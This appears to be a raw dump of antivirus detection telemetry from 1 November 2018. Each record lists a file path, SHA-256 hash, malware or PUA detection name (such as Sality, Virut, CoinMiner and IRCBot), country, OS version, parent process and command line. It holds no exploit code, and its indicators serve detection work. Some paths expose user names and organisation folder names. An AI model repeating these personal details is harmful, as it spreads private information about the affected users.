  Row(detection=Row(filename='avscan-20181101-093624-a70e991b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a23c63b\\AVSCAN-20181101-093252-8C572553\\AVSCAN-20181101-093624-A70E991B', filesize=4608000, name='PUA/GT32SupportGeeks.DM.#M1.#R1'), hash='408ce33176d6d102638423855a95bc325cdc515bdc2622bca6cf79f4f6e35f8a', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T08:36:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwhef18', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWHEF18', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:41:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154533-583be612', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154533-583BE612', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:45:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='english.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\sharing\\DINI\\RPG\\AUDIT\\Suggestion Corrective Action\\versi English\\English.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:26:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-203311-386f46d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_27ba1ee0\\AVSCAN-20181101-203239-31F7DD1D\\AVSCAN-20181101-203311-386F46D0', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:33:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-11-52-10.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-28T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T11:02:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='44da06b791d061704cdc78c02eacba35e5c3385ba3b72dce439bfa2c0838ecd2', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T09:10:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-14-12-07.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T15:22:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1255236\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/mnl', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Documents\\Downloads\\partition-table-doctor_VvT5HH_3476430274.exe', parentsize=2328135, timestamp='2018-11-01T07:18:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\?\\C:\\Windows\\system32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:07:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kesepakatan bersama.pif', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2016\\LPA\\SURAT KESEPAKATAN BERSAMA\\KESEPAKATAN BERSAMA.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:27:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-134906-e64f115e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a11000ca\\AVSCAN-20181101-133328-948CF95C\\AVSCAN-20181101-134906-E64F115E', filesize=2624000, name='TR/Wdfload.1c7b06.#M1.#R1'), hash='1c7b061e3c3050e0e94a836ad4134f8a94ed895fd8cfabb842a1575e32088302', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T06:49:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='taskscheduler.exe', filepath='C:\\Program Files\\CyberLink\\PowerDVD10\\PowerDVD Cinema\\TaskScheduler.exe', filesize=22528000, name='W32/Sality.AT.#M1.#R1'), hash='4f83e2a9483b7ab19fcb8a2d46098ce40ca7f60ba47fa697b0bc5fb66dbe1e01', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T04:21:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1bc88bc3077486d2c93d226264fd02b2dcfc25b2dceff7b022adff0d5b16c75e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\1BC88BC3077486D2C93D226264FD02B2DCFC25B2DCEFF7B022ADFF0D5B16C75E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1bc88bc3077486d2c93d226264fd02b2dcfc25b2dceff7b022adff0d5b16c75e', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:20:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='D:\\Temp\\tmp5715971\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\Temp\\Bit5D5B.tmp.exe', parentsize=2690240, timestamp='2018-11-01T06:17:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe208_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe208 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T20:24:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='6 (negari karunia adi).exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\FD PAK HERMAN\\Hari 6 (Negari Karunia Adi)\\6 (Negari Karunia Adi).exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:42:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-233040-c11f9f89', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9be25e36\\AVSCAN-20181031-232508-97335948\\AVSCAN-20181031-233040-C11F9F89', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T06:30:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110434-ca27135e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110434-CA27135E', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:04:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-214323-77d25556', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b1875d52\\AVSCAN-20181101-214244-723196F0\\AVSCAN-20181101-214323-77D25556', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:43:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111055-fa3c7493', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111055-FA3C7493', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:10:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='smartprintsetup.exe', filepath='\\\\ishq.local\\ishdfs\\Common\\Library\\~snapshot\\hourly.0\\Software\\OLD\\Drivers\\Printers\\HP 7500A\\OJ7500_E910\\Toolbar\\smartprintsetup.exe', filesize=964000, name='W32/Sality.Y.#M1.#R1'), hash='69045197271e1e1ecf56b9ce5725b995543eba63e5282c7023d9c1eb9f6332e5', metadata=Row(cmdline=None, country='AO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Trend\\SProtect\\x64\\SpntSvc.exe', parentsize=93696, timestamp='2018-11-01T09:33:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cscript.exe', filepath='C:\\PROGRAM FILES\\OFFICE 2010 激活文件\\MINI-KMS 1.3\\cscript.exe', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='f061c0a99b876ca1154830083b9c8e8a10e4e88d027298175e50bbd12161d6b0', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:49sueK368k+zChEF.1', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T00:47:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Documents and Settings\\X\\My Documents\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='AL', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:31:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-104557-a62af02b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a1bd6140\\AVSCAN-20181101-104511-9D396937\\AVSCAN-20181101-104557-A62AF02B', filesize=896000, name='HEUR/APC.#M1.#R1'), hash='5cae4d902e2d11f0980df6844ecb2606dd2fb0916bd5f744bddd933201d262de', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:46:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='plugin.dll', filepath='\\\\?\\C:\\Users\\X\\Desktop\\Anubis-Lineage Mobile Bot\\plugin.dll', filesize=2560000, name='TR/BHO.Gen.#M300.#R3363'), hash='5da2bc60bcb4645cc005ccad3fbd9a109dbaa948506a9ccaab246c034bd5aa30', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:46:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='9efcb170c89b7575c13953719263eff6f74be1ffb30c6f047e917ec5793ccfc9', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T16:57:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T20:04:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Documents and Settings\\X\\Mes documents\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:42:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='recorded tv.exe', filepath='C:\\Users\\X\\Recorded TV\\Recorded TV.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:36:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mip.exe', filepath='\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Ink\\mip.exe', filesize=1216000, name='TR/Patched.Ren.Gen.#M300.#R2947'), hash='bbd4091a14df0b36659c02cc3d781d16be0c6a17572212c2413a513955db0eb7', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:19:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='spic.dll', filepath='C:\\Program Files (x86)\\Goral\\spic.dll', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='ca23ef36c43d02666fa97ca6e35451e5d9937aab0f778200aad1f8d7a2736b7e', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4502864, timestamp='2018-11-01T16:03:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered docif', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered docif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='5d3e1662e81cf3058a2979d5ca569df72fda4aa3b500d2b6d3f3aea6fda7f20a', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:52:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sculpteouploader.exe', filepath='C:\\Program Files\\Pixologic\\ZBrush 4R8\\ZStartup\\ZPlugs64\\SculpteoData\\Uploader\\SculpteoUploader.exe', filesize=5000000, name='HEUR/AGEN.1028299.#M1.#R1'), hash='b6eec48c274983f3fd910068c1587c2491d810594440a0551dc5d9c577949d3b', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\In use program\\installer store\\[NN]PZB4R8\\Update\\ZBrush_4R8_P2_Updater.exe', parentsize=111780192, timestamp='2018-11-01T12:21:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pconverter.02acb3d59660479fbf4faf53c0b97d85.exe', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\38CZBVHE\\PConverter.02acb3d59660479fbf4faf53c0b97d85.exe', filesize=376000, name='PUA/MyWebSearch.Gen.#M300.#R6777'), hash='a36c690c41d2651fe6a2e5f9d785ac213521e3b62107bb5a7b6b4ee4372a5b75', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:CkZRKtaJ\\\\\\/kii1nyl.1', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T14:43:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000059dc', filepath='C:\\Windows\\Temp\\tmp00003286\\tmp000059dc', filesize=12800000, name='TR/Patched.Ren.Gen2.#M300.#R100581'), hash='706b0a606aa0d5dbd99e12457e48b957e34c8d6dc63a0495fded9c07cc9130f8', metadata=Row(cmdline='-k bdx -s scan', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-01T08:33:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='r3.exe', filepath='D:\\MAIN CROFIL DOCS SERVER 2010\\BACK UP\\NENITA GARCIA FILES\\SSS-DIFF. COMPANY\\NELTEX SSS\\SSS2010\\NELTEX DEC. 2010\\R3.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='7b5e01a04445eada1618ef0eef6b883161ec945879bb217ac383c8ce7b1ba2f3', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:46:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='server.exe', filepath='C:\\Program Files (x86)\\Autodesk\\Backburner\\server.exe', filesize=320000, name='W32/Neshta.A.#M1.#R1'), hash='5808b1f3fde8f0c4efbe55a835c3b8fdd8d44f7849f16bff22dc2643bfe1e107', metadata=Row(cmdline='\\\\\\/c', country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe', parentsize=185672, timestamp='2018-11-01T10:29:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsf6CB6.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T08:08:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='802ae7db964f28d8551a9790853a114aa39eb8e8a7e2b14560058263708be652', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T21:48:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-214936-66ddfc24', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ce119106\\AVSCAN-20181101-214829-5D8C5858\\AVSCAN-20181101-214936-66DDFC24', filesize=768000, name='TR/Dldr.Zampol.75e966.#M1.#R1'), hash='75e9662275fd9a5eeb9c632ff17ca43dba27480b6123c70517609ebb6e0d51e1', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:49:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00091503', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp00091503', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:46:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='7f4dee35e86892f4a723d124e7eb33228b65b65507e86ee13b9d0364675baace', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\7F4DEE35E86892F4A723D124E7EB33228B65B65507E86EE13B9D0364675BAACE', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7f4dee35e86892f4a723d124e7eb33228b65b65507e86ee13b9d0364675baace', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:06:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T14:01:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00000851', filepath='C:\\Windows\\Temp\\tmp00000159\\tmp00000851', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T11:38:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files (x86)\\Intel\\Intel(R) Integrated Clock Controller Service\\uninstall\\Setup.exe', filesize=2560000, name='W32/Sality.AT.#M1.#R1'), hash='1204fe2b25a9aa16c3c9624329e864138eed174ec43a293120618178ce1ae850', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:35:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\Nuova cartella\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\Nuova cartella\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T19:33:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T06:00:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='professional egr remover.exe', filepath='C:\\Program Files\\Professional EGR Remover\\Professional EGR Remover.exe', filesize=8000000, name='TR/Crypt.ZPACK.Gen.#M300.#R8169'), hash='325fcfaae8403873bd8772fa2c68a7e1a4b9ba82601c29b9be4663862cbc8e6d', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:21:57Z'), dt=datetime.date(2018, 11, 1)),
